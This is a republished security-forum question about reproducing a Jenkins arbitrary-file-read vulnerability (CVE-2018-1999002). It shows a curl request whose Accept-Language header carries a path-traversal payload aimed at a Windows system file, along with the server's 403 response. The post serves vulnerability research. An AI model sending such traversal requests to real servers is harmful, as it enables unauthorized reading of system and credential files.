CVE-2018-1999002 Jenkins arbitrary file read: has anyone managed to reproduce it?

2019-04-04, about 318 characters, estimated reading time 1 minute

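Notice: this article, "CVE-2018-1999002 Jenkins arbitrary file read: has anyone managed to reproduce it?", was first published by author fa11ing1eaf on the Xianzhi community (先知社区) on 2018-07-25 21:32:19 and had been viewed 1720 times.

Thanks to fa11ing1eaf for the hard work!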

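I used the official Docker image and tested on Linux, and also tested on Windows. Neither one reproduced it.
Is there a pitfall somewhere that I'm missing?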

~ > curl 'http://192.168.1.51:8080/plugin/credentials/.ini' -H 'Accept-Language: ../../../../../../../../../../windows/win' -H 'Cookie: JSESSIONID.a3d85595=node01v1c3z2oeevt5mucfmjq8er3e1.node0; screenResolution=1920x1080; JSESSIONID.b2a47fc0=node02xwyedhvismk1ilmk23ziw4010.node0; JSESSIONID.4d57c7d3=node0kheawubrizfx1s6peq1c05uwu0.node0' -v
*   Trying 192.168.1.51...
* Connected to 192.168.1.51 (192.168.1.51) port 8080 (#0)
> GET /plugin/credentials/.ini HTTP/1.1
> Host: 192.168.1.51:8080
> User-Agent: curl/7.43.0
> Accept: */*
> Accept-Language: ../../../../../../../../../../windows/win
> Cookie: JSESSIONID.a3d85595=node01v1c3z2oeevt5mucfmjq8er3e1.node0; screenResolution=1920x1080; JSESSIONID.b2a47fc0=node02xwyedhvismk1ilmk23ziw4010.node0; JSESSIONID.4d57c7d3=node0kheawubrizfx1s6peq1c05uwu0.node0
>
< HTTP/1.1 403 Forbidden
< Date: Wed, 25 Jul 2018 13:30:59 GMT
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< X-Hudson: 1.395
< X-Jenkins: 2.132
< X-Jenkins-Session: 3a9c067d
< X-You-Are-Authenticated-As: anonymous
< X-You-Are-In-Group-Disabled: JENKINS-39402: use -Dhudson.security.AccessDeniedException2.REPORT_GROUP_HEADERS=true or use /whoAmI to diagnose
< X-Required-Permission: hudson.model.Hudson.Read
< X-Permission-Implied-By: hudson.security.Permission.GenericRead
< X-Permission-Implied-By: hudson.model.Hudson.Administer
< Content-Length: 853
< Server: Jetty(9.4.z-SNAPSHOT)
<
<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2Fplugin%2Fcredentials%2F.ini'/><script>window.location.replace('/login?from=%2Fplugin%2Fcredentials%2F.ini');</script></head><body style='background-color:white; color:white;'>


Authentication required
<!--
You are authenticated as: anonymous
Groups that you are in:

Permission you need to have (but didn't): hudson.model.Hudson.Read
 ... which is implied by: hudson.security.Permission.GenericRead
 ... which is implied by: hudson.model.Hudson.Administer
-->

* Connection #0 to host 192.168.1.51 left intact
</body></html>

Keywords: ['Beginner', 'Q&A']


This article is licensed under the Creative Commons Attribution 4.0 International License.
